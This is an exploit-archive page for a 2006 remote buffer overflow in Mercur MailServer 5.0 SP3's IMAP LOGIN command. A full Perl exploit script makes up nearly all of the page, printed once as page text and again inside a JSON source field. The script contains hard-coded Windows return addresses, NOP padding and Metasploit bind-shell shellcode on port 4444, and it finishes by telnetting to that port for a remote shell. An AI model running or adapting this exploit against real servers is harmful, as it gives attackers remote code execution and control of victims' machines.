Search...

Mercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)

2006-09-11T00:00:00

ID EXPLOITPACK:01A5DB7CAB922A3E7A74FA5096DC4B11
Type exploitpack
Reporter Jacopo Cervini
Modified 2006-09-11T00:00:00

Description

Mercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)

                                        
                                            #!/usr/bin/perl
# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version
# Perl script based on Sami FTP server remote exploit by Critical Security
# https://www.securityfocus.com/bid/17138
# acaro [at] jervus.it


use IO::Socket::INET;
use Switch;

if (@ARGV &lt; 2) {
print "--------------------------------------------------------------------\n";
print "Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\n";
print " Return address: \n";
print " 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\n";
print " 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\n";
print " If values not specified, Windows 2k Sp4 will be used.\n";
print " Example : ./mercur-login.pl -h127.0.0.1 -o1\n";
print "--------------------------------------------------------------------\n";
}

my $host =   "127.0.0.1";  

my $port = 143;
my $reply;
my $request;
my $pad = "\x90"x268;
my $eip = "\x87\xd0\x58\x02"; # default eip is for Win2k SP4


foreach (@ARGV) {
$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
$eip = $1 if ($_=~/-o(.*)/);
}

switch ($eip) {
case 1 { $eip = "\x87\xd0\x58\x02" } # Windows Win2k SP4 English and Italian version
case 2 { $eip = "\x83\xd0\x0c\x02" } # Windows XP SP2 English and Italian version
}

#Metasploit bind 4444 shellcode
my $shellcode=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" .
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66" .
"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6" .
"\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x67\xf6\x49\xaa" .
"\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x67\xf2\xf3\x1f" .
"\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\xa1\xf7\x30\xdb" .
"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba" .
"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb" .
"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc" .
"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61" .
"\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70" .
"\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44" .
"\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7" .
"\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69" .
"\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9" .
"\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0" .
"\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3" .
"\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7" .
"\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0" .
"\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67" .
"\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1" .
"\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0" .
"\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88" .
"\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d" .
"\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95" .
"\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2";



my $socket = IO::Socket::INET-&gt;new(proto=&gt;'tcp', PeerAddr=&gt;$host, PeerPort=&gt;$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
$exploit = "a001 LOGIN " . $pad. $eip .$shellcode."\r\n";

send $socket, $exploit, 0;
print "[+] sending 1st chunk\n";

$exploit = "a001 LOGIN " . $pad. $eip ."\r\n";

send $socket, $exploit, 0;
print "[+] sending 2nd chunk\n";

print " + connecting port 4444 of $host ...\n";
system("telnet $host 4444");

close $socket;
exit;

# milw0rm.com [2006-09-11]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)", "edition": 1, "reporter": "Jacopo Cervini", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2006-09-11T00:00:00", "title": "Mercur MailServer 5.0 SP3 - IMAP Remote Buffer Overflow (2)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:31", "rev": 2}, "score": {"value": 0.4, "vector": "NONE", "modified": "2020-04-01T19:04:31", "rev": 2}, "vulnersScore": 0.4}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-09-11T00:00:00", "id": "EXPLOITPACK:01A5DB7CAB922A3E7A74FA5096DC4B11", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/perl\n# Tested on Windows 2k Sp4 Italian and English version and Win XP Pro SP2 Italian and English #version\n# Perl script based on Sami FTP server remote exploit by Critical Security\n# https://www.securityfocus.com/bid/17138\n# acaro [at] jervus.it\n\n\nuse IO::Socket::INET;\nuse Switch;\n\nif (@ARGV < 2) {\nprint \"--------------------------------------------------------------------\\n\";\nprint \"Usage : mercur-login.pl -hTargetIPAddress -oTargetReturnAddress\\n\";\nprint \" Return address: \\n\";\nprint \" 1 - 0x0258d087 Windows 2k Sp4 English Italian Version\\n\";\nprint \" 2 - 0x020cd083 Windows XP Pro SP2 English Italian Version\\n\";\nprint \" If values not specified, Windows 2k Sp4 will be used.\\n\";\nprint \" Example : ./mercur-login.pl -h127.0.0.1 -o1\\n\";\nprint \"--------------------------------------------------------------------\\n\";\n}\n\nmy $host = \"127.0.0.1\"; \n\nmy $port = 143;\nmy $reply;\nmy $request;\nmy $pad = \"\\x90\"x268;\nmy $eip = \"\\x87\\xd0\\x58\\x02\"; # default eip is for Win2k SP4\n\n\nforeach (@ARGV) {\n$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);\n$eip = $1 if ($_=~/-o(.*)/);\n}\n\nswitch ($eip) {\ncase 1 { $eip = \"\\x87\\xd0\\x58\\x02\" } # Windows Win2k SP4 English and Italian version\ncase 2 { $eip = \"\\x83\\xd0\\x0c\\x02\" } # Windows XP SP2 English and Italian version\n}\n\n#Metasploit bind 4444 shellcode\nmy $shellcode=\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\" .\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\xe0\\x66\" .\n\"\\x1c\\xc2\\x83\\xeb\\xfc\\xe2\\xf4\\x1c\\x8e\\x4a\\xc2\\xe0\\x66\\x4f\\x97\\xb6\" .\n\"\\x31\\x97\\xae\\xc4\\x7e\\x97\\x87\\xdc\\xed\\x48\\xc7\\x98\\x67\\xf6\\x49\\xaa\" .\n\"\\x7e\\x97\\x98\\xc0\\x67\\xf7\\x21\\xd2\\x2f\\x97\\xf6\\x6b\\x67\\xf2\\xf3\\x1f\" .\n\"\\x9a\\x2d\\x02\\x4c\\x5e\\xfc\\xb6\\xe7\\xa7\\xd3\\xcf\\xe1\\xa1\\xf7\\x30\\xdb\" .\n\"\\x1a\\x38\\xd6\\x95\\x87\\x97\\x98\\xc4\\x67\\xf7\\xa4\\x6b\\x6a\\x57\\x49\\xba\" .\n\"\\x7a\\x1d\\x29\\x6b\\x62\\x97\\xc3\\x08\\x8d\\x1e\\xf3\\x20\\x39\\x42\\x9f\\xbb\" .\n\"\\xa4\\x14\\xc2\\xbe\\x0c\\x2c\\x9b\\x84\\xed\\x05\\x49\\xbb\\x6a\\x97\\x99\\xfc\" .\n\"\\xed\\x07\\x49\\xbb\\x6e\\x4f\\xaa\\x6e\\x28\\x12\\x2e\\x1f\\xb0\\x95\\x05\\x61\" .\n\"\\x8a\\x1c\\xc3\\xe0\\x66\\x4b\\x94\\xb3\\xef\\xf9\\x2a\\xc7\\x66\\x1c\\xc2\\x70\" .\n\"\\x67\\x1c\\xc2\\x56\\x7f\\x04\\x25\\x44\\x7f\\x6c\\x2b\\x05\\x2f\\x9a\\x8b\\x44\" .\n\"\\x7c\\x6c\\x05\\x44\\xcb\\x32\\x2b\\x39\\x6f\\xe9\\x6f\\x2b\\x8b\\xe0\\xf9\\xb7\" .\n\"\\x35\\x2e\\x9d\\xd3\\x54\\x1c\\x99\\x6d\\x2d\\x3c\\x93\\x1f\\xb1\\x95\\x1d\\x69\" .\n\"\\xa5\\x91\\xb7\\xf4\\x0c\\x1b\\x9b\\xb1\\x35\\xe3\\xf6\\x6f\\x99\\x49\\xc6\\xb9\" .\n\"\\xef\\x18\\x4c\\x02\\x94\\x37\\xe5\\xb4\\x99\\x2b\\x3d\\xb5\\x56\\x2d\\x02\\xb0\" .\n\"\\x36\\x4c\\x92\\xa0\\x36\\x5c\\x92\\x1f\\x33\\x30\\x4b\\x27\\x57\\xc7\\x91\\xb3\" .\n\"\\x0e\\x1e\\xc2\\xf1\\x3a\\x95\\x22\\x8a\\x76\\x4c\\x95\\x1f\\x33\\x38\\x91\\xb7\" .\n\"\\x99\\x49\\xea\\xb3\\x32\\x4b\\x3d\\xb5\\x46\\x95\\x05\\x88\\x25\\x51\\x86\\xe0\" .\n\"\\xef\\xff\\x45\\x1a\\x57\\xdc\\x4f\\x9c\\x42\\xb0\\xa8\\xf5\\x3f\\xef\\x69\\x67\" .\n\"\\x9c\\x9f\\x2e\\xb4\\xa0\\x58\\xe6\\xf0\\x22\\x7a\\x05\\xa4\\x42\\x20\\xc3\\xe1\" .\n\"\\xef\\x60\\xe6\\xa8\\xef\\x60\\xe6\\xac\\xef\\x60\\xe6\\xb0\\xeb\\x58\\xe6\\xf0\" .\n\"\\x32\\x4c\\x93\\xb1\\x37\\x5d\\x93\\xa9\\x37\\x4d\\x91\\xb1\\x99\\x69\\xc2\\x88\" .\n\"\\x14\\xe2\\x71\\xf6\\x99\\x49\\xc6\\x1f\\xb6\\x95\\x24\\x1f\\x13\\x1c\\xaa\\x4d\" .\n\"\\xbf\\x19\\x0c\\x1f\\x33\\x18\\x4b\\x23\\x0c\\xe3\\x3d\\xd6\\x99\\xcf\\x3d\\x95\" .\n\"\\x66\\x74\\x32\\x6a\\x62\\x43\\x3d\\xb5\\x62\\x2d\\x19\\xb3\\x99\\xcc\\xc2\";\n\n\n\nmy $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);\n$socket or die \"Cannot connect to host!\\n\";\n\nrecv($socket, $reply, 1024, 0);\nprint \"Response:\" . $reply;\n$exploit = \"a001 LOGIN \" . $pad. $eip .$shellcode.\"\\r\\n\";\n\nsend $socket, $exploit, 0;\nprint \"[+] sending 1st chunk\\n\";\n\n$exploit = \"a001 LOGIN \" . $pad. $eip .\"\\r\\n\";\n\nsend $socket, $exploit, 0;\nprint \"[+] sending 2nd chunk\\n\";\n\nprint \" + connecting port 4444 of $host ...\\n\";\nsystem(\"telnet $host 4444\");\n\nclose $socket;\nexit;\n\n# milw0rm.com [2006-09-11]", "cvss": {"score": 0.0, "vector": "NONE"}}